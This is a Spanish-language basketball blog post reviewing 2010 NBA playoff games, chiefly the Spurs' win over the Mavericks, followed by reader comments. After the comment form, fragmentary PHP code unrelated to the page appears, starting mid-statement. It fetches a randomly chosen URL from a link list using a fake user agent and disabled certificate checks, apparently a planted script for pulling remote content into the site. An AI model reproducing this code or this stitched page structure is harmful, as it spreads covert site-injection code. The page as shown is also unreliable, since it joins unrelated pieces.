Playoffs 21/04/2010: “I hate the Spurs”

22 de April de 2010 por TheDeerHunter

Con esta “dicharachera” proclama hacía sangre Marc Cuban tras la primera victoria de su equipo en este derbi tejano. Parece increíble que con los años lleva el hombre en esta liga no sepa que aquí sacar pecho es la antesala de que te lo partan. Pero claro, ya decía el sabio que la experiencia no te lo da el tiempo vivido, sino el reflexionado. Y Marc Cuban, a pesar de su incuestionable éxito empresarial se muestra de todo menos cauto y reflexivo.

Poca falta les hace al equipo de Popovich, Duncan, Ginobili, etc… que alguien les enseñe el camino de la motivación. Más bien al contrario. Muy nerviosos a estas alturas de la vida, casi a la vuelta de todo, no se van a poner. Pero enfocando ese extra por muy insignificante que pueda ser Cuban para ellos, puede ser muy peligroso. Es como darle una patada a un avispero y esperar que vas a poder esquivar todos los picotazos.

El caso es que, con odios o no de por medio, los Spurs rompieron anoche la ventaja campo de los Mavericks y lo hicieron desde el carácter que les ha conducido a tantos éxitos: Una defensa letal y la consistencia ofensiva de Duncan, Ginobili y Parker. Anoche, además, se unió a la fiesta Richard Jefferson, en un nivel que se aproxima mucho al que esperaban de él cuando se le fichó. Con esas 4 figuras en la mano y a buen nivel, Popovic puede mirar directamente a los ojos a quien sea en esta liga. Avisados están todos.

Por parte de los Mavs una buena parte de la derrota se la llevó Nowitzki en su particular enfrentamiento con Duncan y un Jason Kidd que lo pasó bastante mal. Los pívots firmaron una actuación menos eficaz bajo tableros, cediendo también esa estadística que sí habían ganado el otro día… y Caron Butler tampoco tuvo su día (a Marion ni lo menciono, rozando el ridículo). El mejor de su equipo fue Jason Terry que sí supo sacar partido del caos que fue su equipo ofensivamente. Popovic puede estar satisfecho de que sólo se le escapara él de su tela de araña.

Hubo mucho menos color en el Charlotte@Orlando. Los Bobcats se atascaron durante toda la primera parte, donde anotaron menos que los Magic en el tercer cuarto. Van Gundy fue capaz de adaptar su equipo a cada planteamiento que puso encima de la mesa Larry Brown. Si los Bobcats se ponían a defender, Orlando lo hacía más mejor… y si se ponían a atacar, también. A pesar de la gran actuación de Stephen Jackson (¿renqueante?) no les dieron ni la más mínima opción. Epílogo anticipado de lo que va a resultar esta eliminatoria.

PREMIOS

MVP: Eternamente Duncan. Con una ventaja de 20 puntos reducida a sólo 6, el de Islas Vírgenes decidió que era el momento de sentenciar. Anotó 4 canastas consecutivas, elevó su cifra anotadora hasta los 25 puntos y culminó su actuación con 17 rebotes y un +26 de parcial con él en pista. Como en sus mejores días.

Rookie: Muy poquita cosa por parte de los novatos, tanto que lo dejamos desierto.

Sorpresa: Y de repente, Richard Jefferson. El raje de Popovich tras el primer partido de la serie parece que ha funcionado y el alero despertó con una gran primera mitad, clave en el triunfo de los Spurs. 19 puntos y 7 rebotes es bastante más de lo que esperábamos de él.

Decepción: Nuestra sección de “Missing” la ocupa hoy Shawn Marion. La última vez que se le vio vestía el uniforme de los Mavs y se preparaba para jugar ante los Spurs el segundo partido de la primera ronda de Playoffs. Desde entonces, no tenemos noticias suyas: 6 puntos, 2 rebotes, 0 asistencias, 0 robos, 0 tapones.

Mayor esfuerzo en vano: Nowitzki, tras un inicio lastrado por problemas de faltas, fue capaz de firmar 24 puntos, 10 rebotes y 4 asistencias. Los 27 puntos de Terry y de Stephen Jackson también merecen mención en este apartado reservado a los mejores entre los perdedores de la noche.

Y MAÑANA…

Oportunidades para Bulls y Thunder de inaugurar su casillero de victorias. ¿A cuál de los equipos veis más cerca de conseguirlo? Y en el Rose Garden un apasionante Blazers-Suns que puede resultar fundamental para decidir al ganador de la eliminatoria.

Comenta

16 comentarios a esta entrada

  1. luigi_sal dice:
    #1

    me encanta esta página, entro desde hace poco! la verdad esq mis equipos van distintos: los thunder complicado, los suns en progreso y los magic a su nivel. no entiendo muy bien lo de howard y me gustaría que me lo explicaráis: tanto cuesta entrenar un tiro de 4 metros o un tiro a tabla? y entrenar tiros libres hasta alcanzar un 75%? y mira que me gusta cómo defiende y cómo domina. vaya equipo tienen los magic, creo que van a llegar hasta los cavs sin mucho problema…y allí ya veremos, como el año pasado

      Citar

  2. luigi_sal dice:
    #2

    por cierto, mark cuban. lo tuyo solo se puede decir de una manera: ZAS, EN TODA LA BOCA!

      Citar

  3. pcerezo dice:
    #3

    Duncan, Duncan, Duncan, Duncan…

      Citar

  4. rojorob dice:
    #4

    Duncan, Duncan, Duncan, Duncan…

      Citar

  5. pcerezo dice:
    #5

    A mi no se me ocurre más…bueno si: Ginobili, Ginobili, Ginobili, Ginobili…

      Citar

  6. rojorob dice:
    #6

    Sí, sí, Ginobili bien. Y Nowitzki y tantos otros. Pero creo que lo de Duncan se lo contaremos a nuestros nietos y les diremos: “Tú no tienes ni puta idea, ese que te gusta a ti es un mindundi. Yo vi jugar a TIM SIGLO XXI DUNCAN”.

      Citar

  7. pcerezo dice:
    #7

    “Bienvenido a la Guerra de las Galaxias…Episodio 1…”. Contigo Rojorob…

      Citar

  8. TheDeerHunter dice:
    #8

    Yo estoy completamente de acuerdo, a pesar de que yo también “I hate the Spurs”

    Lo que más me maravilla es que, con la pedazo de temporada que se ha marcado Duncan una vez más y algunos lo han dado por muerto.
    Hoy por hoy sigue siendo tan bueno como el que más.

      Citar

  9. pcerezo dice:
    #9

    Ahora hablando del PO yo creo que Spurs y Mavs se van a siete partidos. Va a ser tremendo…

      Citar

  10. CAMPO2 dice:
    #10

    George hill que yo sepa es de 2º año

      Citar

  11. Txusma dice:
    #11

    Y por cierto, o Rudy se pone las pilas o las cosas se van a poner muy difíciles en Oregon.

      Citar

  12. sayim dice:
    #12

    yo creo q tal y como está rudy ahora mismo cualquier cambio le viene bien… Si no puede jugar en Portland, tendrá sitio en otro equipo. Tiene un contrato muy apetecible, de un millon de dolares, muy por debajo de sus capacidades como jugador dado como está el mercado….

      Citar

  13. sergio dice:
    #13

    Lo primero.. me ha encantado tu artículo de hoy Deer. Muchos similes, metáforas y alegorías (jo, como me acuerdo de las figuras literarias…) que lo han hecho ameno de leer.

    Lo segundo, pongamos las cosas en su sitio. Los Spurs han ganado este partido porque se han producido todos los hechos que tenian que producirse: Jefferson ha jugado bien, Duncan además se ha comido a Nowitzki, Ginobili en modo All-Star y Parker volviendo por sus fueros. Sigo viendo favoritos a los Mavericks, sobre todo por fondo de armario. No se me ocurriria jamás dudar de que San Antonio puede eliminar a cualquiera a poco que funcionen como saben… pero no lo han hecho durante la temporada. ¿porque iban a hacerlo ahora varios partidos consecutivos? En cualquier caso, mi deseo es que siempre pase Duncan. Probablemente es el tío más parecido a Russell que ha pisado una cancha de baloncesto.

    Lo tercero. Creo que el rol que debería ocupar Marion en los Mavs es muy similar al de Artest (sin comparar cualidades defensivas creo que son buenos defensores al hombre). Poca exigencia ofensiva y mucha defensiva. Y vamos, si Artest es mejor defensa que Marion, Durant tambien es mejor que Jefferson digo yo…

    P.D: que bonitos son los Playoffs ossshtia

      Citar

  14. TheDeerHunter dice:
    #14

    Pues precísamente considero a los Spurs más peligrosos cuanto más se alargue la serie. Los equipos con perfil más defensivo suelen ir ajustando las marcas.

    No entiendo muy bien qué similitud ves entre lo que aporta Artest y lo que aporta Marion. De hecho a Marion le tengo un poco en el club del “se dejaba llevar” desde ya hace demasiado tiempo. No creo que nunca se le haya podido acusar a Artest de eso.

      Citar

  15. Mariano dice:
    #15

    Sergio, respondiendo a tu pregunta de los partidos consecutivos..

    Lo harán ahora porque hay jugadores que juegan diferente en los PO que en la temporada regular, y SAS tiene 4 de esos..

    ya lo decía ayer, y espero no equivocarme, yo los veo como candidatos al título.. tratenme de loco ahora, pero ojala no se equivoquen 😉 ja.

    Saludos.

      Citar

  16. sergio dice:
    #16

    Yo sigo creyendo en los Spurs con los ojos cerrados, pero tiendo a no exagerar el valor de una victoria. Claro que tienen jugadores que incrementan sus prestaciones en Playoffs, aunque eso puede no se suficiente… recordare que la rotación de los de Dallas, con 8 jugadores importantes, es mucho más potente, y un factor también determinante en series largas.

    Aparte, creo que este año ha sido, de largo, en el que menos diferencias de puntos encajados ha habido entre uno y otro (sólo 3 puntos).

    No ha existido por mi parte comparación posible entre Artest y Marion. Simplemente he dicho que deberian ocupar un rol similar en estas eliminatorias. Ninguno es la primera, ni la segunda, ni la tercera opcion en ataque, por lo que deberían centrarse en defensa (Marion también deberia aportar en el rebote), ambos ocupan la posición en la que más estrellas se van a encontrar camino de los Playoffs… Desde luego que Marion no le llega a la altura del zapato a Artest en cuanto a actitud, intensidad y defensa, pero de ahí a que Jefferson reviva después de 82 partidos sin hacerlo, es otro cantar. Bastantes agujeros que tapar tienen ya los Mavs en la posición de base y escolta, no?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>